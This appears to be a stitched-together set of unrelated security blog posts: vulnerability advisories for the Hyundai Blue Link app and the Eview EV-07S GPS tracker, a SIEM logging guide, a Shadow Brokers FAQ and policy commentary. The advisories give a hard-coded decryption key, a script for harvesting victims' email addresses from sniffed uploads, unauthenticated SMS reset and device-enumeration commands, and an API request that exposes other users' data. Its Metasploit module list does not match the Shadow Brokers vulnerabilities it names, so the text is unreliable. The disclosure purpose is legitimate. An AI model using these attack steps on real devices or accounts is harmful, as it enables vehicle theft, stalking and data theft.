Due to a reliance on cleartext communications and the use of a hard-coded decryption password, two outdated versions of the Hyundai Blue Link application software, 3.9.4 and 3.9.5, potentially expose sensitive information about registered users and their vehicles, including application usernames, passwords, and PINs, via a log transmission feature. This feature was introduced in version 3.9.4 on December 8, 2016, and removed by Hyundai on March 6, 2017 with the release of version 3.9.6.

Affected versions of the Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetric key, "1986l12Ov09e", which is hard-coded in the Blue Link application and cannot be modified by the user.
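Keys embedded this way are trivially recoverable from the shipped application package. As a rough illustration (not the researchers' actual method), a minimal `strings`-style scan over an app's raw bytes will surface embedded literals; the blob below is a stand-in for real application bytes:

```python
import re

def extract_strings(data: bytes, min_len: int = 8) -> list:
    """Return printable-ASCII runs of at least min_len bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)]

# Illustrative only: a synthetic blob standing in for app bytes.
blob = b"\x00\x01LogManager\x00key=1986l12Ov09e\x00\xff"
print(extract_strings(blob))  # ['LogManager', 'key=1986l12Ov09e']
```

Any secret that must ship inside the client is recoverable this way, which is why per-user or server-negotiated keys are preferred.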

Once decoded, the logs contain personal information, including the user's username, password, PIN, and historical GPS data about the vehicle's location. This information can be used to remotely locate, unlock and start the associated vehicle.

This vulnerability was discovered by independent researchers William Hatzer and Arjun Kumar, and this advisory was prepared in accordance with Rapid7's disclosure policy.

Product Description

The Blue Link app is compatible with 2012 and newer Hyundai vehicles. The functionality includes remote start, location services, unlocking and locking associated automobiles, and other features, documented at the vendor's web site.



Exploitation for R7-2017-02

The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by standard man-in-the-middle (MitM) techniques that trick a user into connecting to a WiFi network controlled by the attacker. If this is achieved, the attacker watches for HTTP traffic directed at the log collection service, which includes the encrypted log file with a filename containing the user's email address.

It would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor's service instance.
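To make the passive-listening scenario concrete, here is a hedged sketch of the harvesting step. The request shape and IP below are assumptions for illustration only; the advisory states just that the upload travels over HTTP and that the filename embeds the user's email address:

```python
import re

# Hypothetical captured request: the exact format is an assumption,
# and 203.0.113.10 is a documentation-range placeholder address.
SAMPLE_REQUEST = (
    "POST /logs/upload HTTP/1.1\r\n"
    "Host: 203.0.113.10:8080\r\n"
    'Content-Disposition: form-data; filename="victim@example.com_20170415.log.enc"\r\n\r\n'
)

def harvest_email(raw_http: str):
    """Pull an email address out of an observed upload filename, if any."""
    m = re.search(r'filename="([^"_]+@[^"_]+)', raw_http)
    return m.group(1) if m else None

print(harvest_email(SAMPLE_REQUEST))  # victim@example.com
```

A passive listener needs nothing more than plaintext pattern-matching, which is the core risk of shipping logs over HTTP.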

Vendor Statement

Hyundai Motor America (HMA) was made aware of a vulnerability in the Hyundai Blue Link mobile application by researchers at Rapid7. Upon learning of this vulnerability, HMA launched an investigation to validate the research and took immediate steps to further secure the application. HMA is not aware of any customers being impacted by this potential vulnerability.


The privacy and security of our customers is of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.


On March 6, 2017, the vendor updated the Hyundai Blue Link app to version 3.9.6, which removes the LogManager log transmission feature. In addition, the associated TCP service has been disabled. The mandatory update to version 3.9.6 is available in both the standard Android and Apple app stores.

Disclosure Timeline

  • Thu, Feb 02, 2017: Details disclosed to Rapid7 by the discoverer.
  • Sun, Feb 19, 2017: Details clarified with the discoverer by Rapid7.
  • Tue, Feb 21, 2017: Rapid7 attempted contact with the vendor.
  • Sun, Feb 26, 2017: Vendor updated to v3.9.5, changing LogManager IP and port.
  • Thu, Mar 02, 2017: Vendor provided a case number, Consumer Affairs Case #10023339.
  • Mon, Mar 06, 2017: Vendor responded, details discussed.
  • Mon, Mar 06, 2017: Version 3.9.6 released to the Google Play store.
  • Wed, Mar 08, 2017: Version 3.9.6 released to the Apple App Store.
  • Wed, Mar 08, 2017: Details disclosed to CERT/CC by Rapid7, VU#152264 assigned.
  • Wed, Apr 12, 2017: Details disclosed to ICS-CERT by Rapid7, ICS-VU-805812 assigned.
  • Fri, Apr 21, 2017: Details validated with ICS-CERT and HMA, CVE-2017-6052 and CVE-2017-6054 assigned.
  • Tue, Apr 25, 2017: Public disclosure of R7-2017-02 by Rapid7.
  • Tue, Apr 25, 2017: ICSA-17-115-03 published by ICS-CERT.

In your organizational environment, Audit Logs are your best friend. Seriously. This is the sixth blog of the series based on the CIS Critical Security Controls. I’ll be taking you through Control 6: Maintenance, Monitoring and Analysis of Audit Logs, to help you understand why this friendship is worth nurturing and how it can bring your information security program to a higher level of maturity while gaining visibility into the deep dark workings of your environment.


In the case of a security event or incident, real or perceived, and whether it takes place due to one of the NIST-defined incident threat vectors or falls into the “Other” category, having the data available to investigate and effectively respond to anomalous activity in your environment is not only beneficial, but necessary.


What this Control Covers:

This control has six sections, covering everything from NTP configuration and verbose logging of traffic on network devices, to how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies.



There are many areas where this control runs alongside or directly connects to some of the other controls as discussed in other CIS Critical Control Blog posts.


How to Implement It:

Initial implementation of the different aspects of this control ranges in complexity from a “quick win” to full configuration of log collection, maintenance, alerting, and monitoring.


Network Time Protocol: Here’s your quick win. By ensuring that all hosts on your network use the same time source, event correlation can be accomplished in a much more streamlined fashion. We recommend leveraging the various publicly available NTP pools. Having your systems check in to a single regionally available server on your network, which has in turn obtained its time from the NTP pool, will save you hours of chasing down information.
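For the curious, that "check in" is just SNTP under the hood. A minimal sketch of building a client request and reading a server's transmit timestamp follows; the response here is synthetic so the example never touches the network:

```python
import struct
from datetime import datetime, timezone

NTP_EPOCH_OFFSET = 2208988800  # seconds between 1900-01-01 and 1970-01-01

def build_sntp_request() -> bytes:
    """48-byte SNTP client request: LI=0, VN=3, Mode=3 (client)."""
    return bytes([0x1B]) + b"\x00" * 47

def parse_transmit_time(response: bytes) -> datetime:
    """Extract the seconds part of the transmit timestamp (bytes 40-43)."""
    secs = struct.unpack("!I", response[40:44])[0] - NTP_EPOCH_OFFSET
    return datetime.fromtimestamp(secs, tz=timezone.utc)

# Synthetic response carrying 2017-04-25 00:00:00 UTC in the transmit field.
fake = bytearray(48)
fake[40:44] = struct.pack("!I", 1493078400 + NTP_EPOCH_OFFSET)
print(parse_transmit_time(bytes(fake)))  # 2017-04-25 00:00:00+00:00
```

In practice you would send the request over UDP port 123 to your internal time server and let your OS's NTP daemon handle drift and slewing.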


Reviewing and Alerting: As you can imagine, there is a potential for a huge amount of data to be sent over to your SIEM for analysis and alerting. Knowing what information to capture and retain is a huge part of the initial and ongoing configuration of the SIEM.


Fine-tuning alerts is a challenge for a lot of organizations. What is a critical alert? Who should receive these, and how should they be alerted? What qualifies as a potential security event? SIEM manufacturers and Managed Service Providers have their pre-defined criteria and, for the most part, are able to define clear use cases for what should be alerted upon; however, your organization may have additional needs. Whether those needs result from compliance requirements or from keeping an eye on a specific critical system for anomalous activity, defining your use cases, and ensuring that alerts fire at the appropriate level of concern and reach the appropriate resources, is key to avoiding alert fatigue.
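One way to think about use-case definition is as a routing table from severity to destination. The thresholds and destination names below are purely illustrative, not any particular SIEM's API:

```python
# Hypothetical alert-routing sketch: severities and destinations are
# illustrative placeholders, not a vendor's real configuration schema.
SEVERITY = {"debug": 0, "info": 1, "warning": 2, "critical": 3}

ROUTES = [
    ("critical", "page-oncall"),    # wake someone up
    ("warning",  "soc-queue"),      # triage during business hours
    ("info",     "weekly-report"),  # reviewed, not alerted
]

def route(event_severity: str) -> str:
    """Send an event to the first route whose severity floor it meets."""
    level = SEVERITY[event_severity]
    for floor, destination in ROUTES:
        if level >= SEVERITY[floor]:
            return destination
    return "discard"

print(route("critical"))  # page-oncall
print(route("info"))      # weekly-report
```

Writing your use cases down in this explicit form, even on paper, forces the conversation about who gets woken up and what merely lands in the weekly review.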


Events that may not require immediate notification still have to be reviewed. Most regulatory requirements state that logs should be reviewed "regularly" but remain vague on what this means. A good rule of thumb is to have logs reviewed on a weekly basis, at a minimum. While your SIEM may have the analytical capabilities to draw correlations, there will undoubtedly be items that you find that will require action.


What should I be collecting?

There is a lot of technology out there to “help” secure your environment, from Active Directory auditing tools that pull nicely formatted, predefined reports, to network configuration management tools. Many of these products do the same things your SIEM can do with appropriately managed alerting and reporting; the SIEM should be able to serve as a one-stop shop for your log data.

In a perfect world, where storage isn’t an issue, each of the following items would have security related logs sent to the SIEM.

  • Network gear
    • Switches
    • Routers
    • Firewalls
    • Wireless Controllers and their APs.
  • 3rd Party Security support platforms
    • Web proxy and filtration
    • Anti-malware solutions
    • Endpoint Security platforms (HBSS, EMET)
    • Identity Management solutions
    • IDS/IPS
  • Servers
    • Special emphasis on any system that maintains an identity store, including all Domain Controllers in a Windows environment.
    • Application servers
    • Database servers
    • Web Servers
    • File Servers – Yes, even in the age of cloud storage, file servers are still a thing, and access (allowed or denied) needs to be logged and managed.
  • Workstations
    • All security log files


This list is by no means exhaustive, and even at the level noted we are talking about large volumes of information. This information needs a home. This home needs to be equipped with adequate storage and alerting capabilities.


Local storage is an alternative, but it will not provide the correlation, alerting, or retention capabilities of a full-blown SIEM implementation.


There has been some great work done in helping organizations refine what information to include in log collections. Here are a few resources I have used:

  • SANS - ement-strategies-audit-compliance-33528
  • NIST SP 800-92
  • Malware Archeology



Read more on the CIS Critical Security Controls:


What are the CIS Critical Security Controls?


The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls), is an industry-leading way to answer your key security question: “How can I be prepared to stop known attacks?” The controls transform best-in-class threat data into prioritized and actionable ways to protect your organization from today’s most common attack patterns.


Achievable Implementation of the CIS Critical Security Controls


The interesting thing about the critical security controls is how well they scale to work for organizations of any size, from very small to very large. They are written in easy-to-understand business language, so non-security people can easily grasp what they do. They cover many parts of an organization, including people, processes and technology. As a subset of the priority 1 items in the NIST 800-53 special publication, they are also highly relevant and complementary to many established frameworks.


Leveraging Rapid7's expertise to assist your successful implementation


As part of a Rapid7 managed services unit, the Security Advisory Services team at Rapid7 specializes in security assessments for organizations. Using the CIS Critical Security Controls (formerly the SANS 20 Critical Controls) as a baseline, the team assesses and evaluates strengths and gaps, and makes recommendations on closing those gaps.


The Security Advisory Services team will be posting a blog series on each of the controls. These posts are based on our experience over the last two years of our assessment activity with the controls, and how we feel each control can be approached, implemented and evaluated. If you are interested in learning more about the CIS Critical Controls, stay tuned here as we roll out posts weekly. Thanks for your interest and we look forward to sharing our knowledge with you!


The definitive guide of all CIS Critical Security Controls

As the blog series expands, we’ll use this space to keep a running total of all the 20 CIS Critical Controls. Check back here to stay updated on each control.


Control 1: Inventory of Authorized and Unauthorized Devices

This control is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network, as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls. Learn more.


Control 2: Inventory of Authorized and Unauthorized Software

The second control is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense. Learn more.

Control 3: Secure Configurations for Hardware & Software

This control deals with Secure Configurations for Hardware & Software. The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Controls 1 and 2 are foundational to understanding what inventory you have. The next step, Control 3, is all about shrinking that attack surface by securing the inventory in your network. Learn more.


Control 4: Continuous Vulnerability Assessment & Remediation

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities. Control 4 challenges you to understand why vulnerability management and remediation is important to your overall security maturity. Learn more.


Control 5: Controlled Use of Administrative Privilege

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk.  Discover how reducing or controlling administrative privilege and access can reduce the risk of an attacker comprising your sensitive information. Learn more.

Rapid7 has long been a champion of coordinated vulnerability disclosure and handling processes as they play a critical role in both strengthening risk management practices and protecting security researchers. We not only use coordinated disclosure processes in our own vulnerability disclosure and receiving activities, but also advocate for broader adoption in industry and in government policies.


Building on this, we recently joined forces with other members of the security community to urge NIST and NTIA (both part of the U.S. Dept. of Commerce) to promote adoption of coordinated vulnerability disclosure processes. In each of these two most recent filings, Rapid7 was joined by a coalition of approximately two dozen (!!) like-minded cybersecurity firms, civil society organizations, and individual researchers.


  • Joint comments to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, available here.


  • Joint comments to the National Telecommunications and Information Administration's (NTIA) "Green Paper" on the Internet of Things, available here.


The goal of the comments is for these agencies to incorporate coordinated vulnerability disclosure and handling processes into official policy positions on IoT security (in the case of NTIA) and cybersecurity guidance to other organizations (in the case of NIST). We hope this ultimately translates to broader adoption of these processes by both companies and government agencies.


What are "vuln disclosure processes" and why are they important?

Okay, first off, I really hope infosec vernacular evolves to come up with a better term than "coordinated vulnerability disclosure and handling processes" because boy that's a mouthful. But it appears to be the generally agreed-upon term.


A coordinated vulnerability disclosure and handling process is basically an organization's plan for dealing with security vulnerabilities disclosed from outside the organization. They are formal internal mechanisms for receiving, assessing, and mitigating security vulnerabilities submitted by external sources, such as independent researchers, and communicating the outcome to the vulnerability reporter and affected parties. These processes are easy to establish (relative to many other security measures) and may be tailored for an organization's unique needs and resources. Coordinated vulnerability disclosure and handling processes are not necessarily "bug bounty programs" and may or may not offer incentives, or a guarantee of protection against liability, to vulnerability reporters.


Why are these processes important? The quantity, diversity, and complexity of vulnerabilities will prevent many organizations from detecting all vulnerabilities without independent expertise or manpower. When companies are contacted about vulnerabilities in their products or IT from unsolicited third parties, having a plan in place to get the information to the right people will lead to a quicker resolution. Security researchers disclosing vulnerabilities are also better protected when companies clarify a process for receiving, analyzing, and responding to the disclosures – being prepared helps avoid misunderstandings or fear that can lead to legal threats or conflicts.


To catch vulnerabilities they might otherwise overlook, businesses and government agencies are increasingly implementing vulnerability disclosure and handling processes, but widespread adoption is not yet the norm.


NIST Framework comments

The NIST Framework is a voluntary guidance document for organizations for managing cybersecurity risks. The Framework has seen growing adoption and recognition, and is an increasingly important resource that helps shape cybersecurity implementation in the public and private sectors. NIST proposed revisions to the Framework and solicited comments to the revisions.


In our joint comments, the coalition urged NIST to expressly incorporate vulnerability disclosure processes into the Framework. The Framework already included "external participation" components and metrics (likely directed at formal cyber threat intel sharing arrangements), but they are unclear and don't explicitly refer to vulnerability disclosure processes.


Specifically, our comments recommended that the Framework Core include a new subcategory dedicated to vulnerability disclosure processes, and to build the processes into existing subcategories on risk assessment and third party awareness. Our comments also recommended revising the "external participation" metric of the Framework Tiers to lay out a basic maturity model for vulnerability disclosure processes.


NTIA Internet of Things "Green Paper" comments

NTIA issued a “Green Paper” in late 2016 to detail its overall policies with regard to the Internet of Things, then solicited feedback and comments on that draft. Although the Dept. of Commerce has demonstrated its support for vulnerability disclosure and handling processes, there was little discussion of this issue in the Green Paper. The Green Paper is important because it will set the general policy agenda and priorities for the Dept. of Commerce on the Internet of Things (IoT).


In our joint comments, the coalition urged NTIA to include a more comprehensive discussion of vulnerability disclosure and handling processes for IoT. This will help clarify and emphasize the role of vulnerability disclosure in the Dept. of Commerce's policies on IoT security going forward.


The comments also urged NTIA to commit to actively encouraging IoT vendors to adopt vulnerability disclosure and handling processes. The Green Paper mentioned NTIA's ongoing "multistakeholder process" on vulnerability disclosure guidelines, which Rapid7 participates in, but the Green Paper did not discuss any upcoming plans for promoting adoption of vulnerability disclosure and handling processes. Our comments recommended that NTIA promote adoption among companies and government agencies in IoT-related sectors, as well as work to incorporate the processes into security guidance documents.


More coming

Rapid7 is dedicated to strengthening cybersecurity for organizations, protecting consumers, and empowering the independent security research community to safely disclose vulnerabilities they've discovered. All these goals come together on the issue of coordinated vulnerability disclosure processes. As we increasingly depend on complex and flawed software and systems, we must pave the way for greater community participation in security. Facilitating communication between technology providers and operators and independent researchers is an important step toward greater collaboration aimed at keeping users safe.


Rapid7 is thrilled to be working with so many companies, groups, and individuals to advance vulnerability disclosure and handling processes. As government agencies consider how cybersecurity fits into their missions, and how to advise the public and private sectors on what to do to best protect themselves, we expect more opportunities to come.


You can learn more about our policy engagement efforts on Rapid7's public policy page.

The Rapid7 team has been busy evaluating the threats posed by last Friday’s Shadow Broker exploit and tool release and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.

What’s the story?

On Friday, April 14, a hacking group known as the “Shadow Brokers” released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools.

This was understandably a cause for concern but, fortunately, none of the exploits were zero-days. Many targeted older systems whose vulnerabilities were already well known, and four of the exploits targeted vulnerabilities that were patched last month.


Who are these shady characters?

The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as Equation Group. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.


The April 14th release seems to be the culmination of the Shadow Brokers’ activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.


Should you be worried?

A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the vulnerabilities, so a very good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check. 

If you are unsure if you are up to date on these patches, we have checks for them all in Rapid7 Nexpose and Rapid7 InsightVM. These checks are all included in the Microsoft hotfix scan template.
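If you would rather spot-check a host by hand, the comparison is simple set logic: installed hotfixes versus the KBs a bulletin requires. KB4013389 is the March 2017 MS17-010 update, but verify the exact KB mapping against Microsoft's advisory for your specific OS version; the rest of the sketch is illustrative:

```python
# Rough patch-audit sketch: compare installed hotfixes (e.g. gathered
# from `wmic qfe list`) against the KBs a bulletin requires. Verify the
# bulletin->KB mapping against Microsoft's advisory for your SKU.
REQUIRED = {"MS17-010": {"KB4013389"}}

def missing_patches(installed: set) -> dict:
    """Return bulletin -> KBs still absent from this host."""
    return {bulletin: kbs - installed
            for bulletin, kbs in REQUIRED.items()
            if kbs - installed}

print(missing_patches({"KB3212646"}))  # {'MS17-010': {'KB4013389'}}
print(missing_patches({"KB4013389"}))  # {}
```

A vulnerability management product does the same comparison at scale, with the bulletin-to-KB mapping maintained for you.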

If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in Rapid7 Metasploit:

  • MS14-068 / CVE-2014-6324
  • auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
  • auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
  • exploits/windows/smb/ms09_050_smb2_negotiate_func_index

In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.


What else can you do to protect yourselves?

If patching is still in progress or will take a little longer to fully implement (we get it), there are detections for the exploits that you can implement while patching is underway. For examples of ways to implement detections, check out this blog post from Mike Scutt.


Rapid7 InsightIDR, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this 4-min Solution Short.


It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak.


What about that IIS 6 box we have on the public internet?

It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (“EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.


Should you be worried about the Equation Group?

The threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky’s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.


While that is good news for most organizations, that doesn’t mean there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. For most organizations, the larger threat is that of attackers co-opting these very sophisticated, and now public, exploits and post-exploitation tools and using them to achieve their own goals. This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it takes criminals to incorporate exploits into their existing operations. It will not be long before we start to see more widespread attacks using these tools.

Where should I build my underground bunker?

While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn’t it.



It’s the $64,000 question in security – both figuratively and literally: where do you spend your money? Some people vote, at least initially, for risk assessment. Some for technology acquisition. Others for ongoing operations. Smart security leaders will cover all the above and more. It’s interesting though – according to a recent study titled the 2017 Thales Data Threat Report, security spending is still a bit skewed. For instance, security compliance is the top driver of security spending. One would think that business risk and common sense would be core drivers but we all know how the world works.


The Thales study also found that network and endpoint security were respondents’ top spending priorities, yet 30 percent of respondents say their organizations are 'very vulnerable' or 'extremely vulnerable' to security attacks. So, people are spending money on security solutions that may not be addressing their true challenges. Perhaps more email phishing testing needs to be performed. I’m finding that to be one of the most fruitful exercises anyone can do to improve their security program – as long as it’s being done the right way. Maybe more or better security assessments are required. Only you – and the team of people in charge of security – will know what’s best.


The mismatch of security priorities and spending is something I see all the time in my work. Security policies are documented, advanced technologies are implemented, and executives are assuming that all is well with security given all the effort and money being spent. Yet, ironically, in so many cases not a single vulnerability scan has been run, much less a formal information risk assessment has been performed. Perhaps testing has been done but maybe it wasn’t the right type of testing. Or, the right technologies have been installed but their implementation is sloppy or under-managed.


This mismatch is an issue that’s especially evident in healthcare (i.e. HIPAA compliance checkbox) but affects businesses large and small across all industries. It’s the classic case of putting the cart before the horse. I strongly believe in the concept of “you cannot secure what you don’t acknowledge”. But you first have to properly acknowledge the issues – not just buy into them because they’re “best practice”. Simply going through the motions and spending money on security will make you look busy and perhaps demonstrate to those outside of IT and security that something is being done to address your information risks. But that’s not necessarily the right thing to do.


The bottom line: don’t spend that hard-earned $64,000 on security just for the sake of security. Step back. Know what you’ve got, understand how it’s truly at risk, and then, and only then, do something about it. Look at the bigger picture of security – what it means for your organization and how it can best be addressed based on your specific needs, rather than what someone else is eager to sell you.

Seven issues were identified with the Eview EV-07S GPS tracker, which can allow an unauthenticated attacker to identify deployed devices, remotely reset devices, learn GPS location data, and modify GPS data. These issues are briefly summarized in the table below.


These issues were discovered by Deral Heiland of Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.


| Vulnerability Description | R7 ID | CVE | Exploit Vector |
| --- | --- | --- | --- |
| Unauthenticated remote factory reset | R7-2016-28.1 | CVE-2017-5237 | Phone number |
| Remote device identification | R7-2016-28.2 | None | Phone number range |
| Lack of configuration bounds checks | R7-2016-28.3 | CVE-2017-5238 | Phone number |
| Unauthenticated access to user data | R7-2016-28.4 | None (server-side issue) | Web application |
| Authenticated user access to other users' data | R7-2016-28.5 | None (server-side issue) | Web application user account |
| Sensitive information transmitted in cleartext | R7-2016-28.6 | CVE-2017-5239 | Man-in-the-Middle (MitM) network |
| Web application data poisoning | R7-2016-28.7 | None (server-side issue) | Web application |


Product Description

The EV-07S is a personal GPS tracker device used for personal safety and security, described at the vendor's website as being primarily intended for tracking elderly family members; disabled and patient care; child protection; employee management; and pet and animal tracking. Test devices were acquired from Eview directly, and an example is shown below in Figure 1.


Figure 1: The EV-07S personal GPS tracker device


R7-2016-28.1: Unauthenticated remote factory reset

Given knowledge of the EV-07S's registered phone number, the device can be reset to factory settings by sending "RESET!" as a command in an SMS message. Only the phone number is required; no password or physical access is needed to accomplish this. After a factory reset, the device can then be reconfigured remotely via SMS messages, again without a password. The product manual documents this behavior, so it appears to be a fundamental design flaw with regard to secure configuration.


Mitigation for R7-2016-28.1

A vendor-supplied patch should prevent the device from accepting a factory reset command without authentication or physical access to the device.


Absent a patch, users should regularly check their device to ensure the configuration has not been deleted or altered.


R7-2016-28.2: Remote device identification

The EV-07S device, once set up with a password, should not respond to any SMS queries sent to its phone number. According to the user manual, no password is needed to send the "reboot" and "RESET!" commands to the device. Testing showed that, despite the manual's statement, the "reboot" command did require a password when the device was set up for authentication. Further manual fuzzing via SMS revealed that the command "REBOOT!" causes the device to respond with the message "Format error!".


Because the device returns this error response even when password-protected, a malicious actor could enumerate all deployed devices by sending SMS messages containing the "REBOOT!" command to every likely phone number, an approach commonly known as war dialing.



Figure 2: SMS command response on password protected device


Mitigation for R7-2016-28.2

A vendor-supplied patch should disable the response from the "REBOOT!" command when password protection is enabled.


R7-2016-28.3: Lack of configuration bounds checks

Several configuration fields were found not to perform proper bounds checks on incoming SMS messages. If a device's phone number is known to an attacker, this lack of bounds checking allows an overly long value for one configuration setting to overwrite the data of another. An example of this is shown in Figure 3, where the "Authorized Number" setting A1 is used to overwrite setting B1:



Figure 3: Configuration Setting Overflow Via SMS Message
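The bug class is easy to demonstrate in miniature. The sketch below simulates a flat settings buffer with fixed 20-byte slots and an unchecked write; the field names and slot size are illustrative assumptions, not the EV-07S's actual memory layout:

```python
# Toy model of the bug class: settings stored at fixed 20-byte offsets,
# with no bounds check on writes. Field names and sizes are assumptions
# for illustration only.

FIELD_SIZE = 20
FIELDS = ["A1", "B1", "C1"]  # authorized-number slots, per the advisory's example

def make_buffer():
    return bytearray(FIELD_SIZE * len(FIELDS))

def write_field_unchecked(buf, name, value):
    """Vulnerable write: copies the whole value starting at the field's
    offset, spilling into the next slot when len(value) > FIELD_SIZE."""
    off = FIELDS.index(name) * FIELD_SIZE
    buf[off:off + len(value)] = value.encode()

def read_field(buf, name):
    off = FIELDS.index(name) * FIELD_SIZE
    return bytes(buf[off:off + FIELD_SIZE]).rstrip(b"\x00").decode()

buf = make_buffer()
write_field_unchecked(buf, "B1", "+15551234567")
write_field_unchecked(buf, "A1", "A" * 25)  # 25 chars into a 20-byte slot
print(read_field(buf, "B1"))                # prints "AAAAA1234567" -- B1 corrupted
```

In the real device the same effect is achieved over SMS; the fix is simply to reject or truncate any value longer than its slot before copying it into place.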


Mitigation for R7-2016-28.3

A vendor-supplied patch should implement bounds checks and input sanitization on all entered configuration data.


Absent a vendor-supplied patch, users should avoid entering values of excessive length. In the case of the Authorized Number setting, anything over 20 characters will overwrite the next setting in line.


R7-2016-28.4: Unauthenticated access to user data

A malicious actor can gain access to user data, including the account name, TrackerID, and device IMEI. This is done by posting userId=5XXXX&trackerName=&type=allTrackers, with the target's userId number, to the API. An example of this is shown below in Figure 4:



Figure 4: HTTP post to gain access to user data


Given the small keyspace involved in guessing valid five-digit user IDs, it appears trivial to determine every valid user ID.
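To put that keyspace in perspective, here is a back-of-envelope sketch. The "5XXXX" pattern implies at most 10,000 candidate IDs; the request rate below is purely an assumption for illustration:

```python
# Back-of-envelope on the "5XXXX" user ID keyspace: five digits with a
# leading 5 leaves only 10,000 candidates. The request rate is an
# assumption for illustration, not a measured figure.
candidates = range(50000, 60000)
requests_per_second = 10                 # assumed, deliberately modest
minutes_to_walk = len(candidates) / requests_per_second / 60

print(len(candidates))          # 10000
print(round(minutes_to_walk))   # 17 -- minutes to try every ID
```

Even at a rate slow enough to avoid attention, the entire user base can be enumerated in well under an hour.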


Mitigation for R7-2016-28.4

A vendor-supplied patch on the vendor web application should prevent unauthenticated access to individual user data.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.5: Authenticated access to other users' data

An authenticated user can gain access to other users' configuration and device GPS data if they know or can guess a valid userId, device IMEI, or TrackerID. The following three examples (Figures 5 through 7) show one authenticated account accessing another account's data.



Figure 5: Access to another user's configuration data



Figure 6: Access to another user's device GPS data



Figure 7: Access to another user's GPS tracker configuration


Mitigation for R7-2016-28.5

A vendor-supplied patch should prevent access to other users' data.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.6:  Sensitive information transmitted in cleartext

The realtime tracking web application does not utilize SSL/TLS encryption for its HTTP services. In addition, the EV-07S device passes IMEI and GPS data to this website over the Internet on TCP port 5050 without any encryption. An example of this captured unencrypted data is shown below in Figure 8:



Figure 8: Unencrypted Transfer of Information From Device Over Port 5050


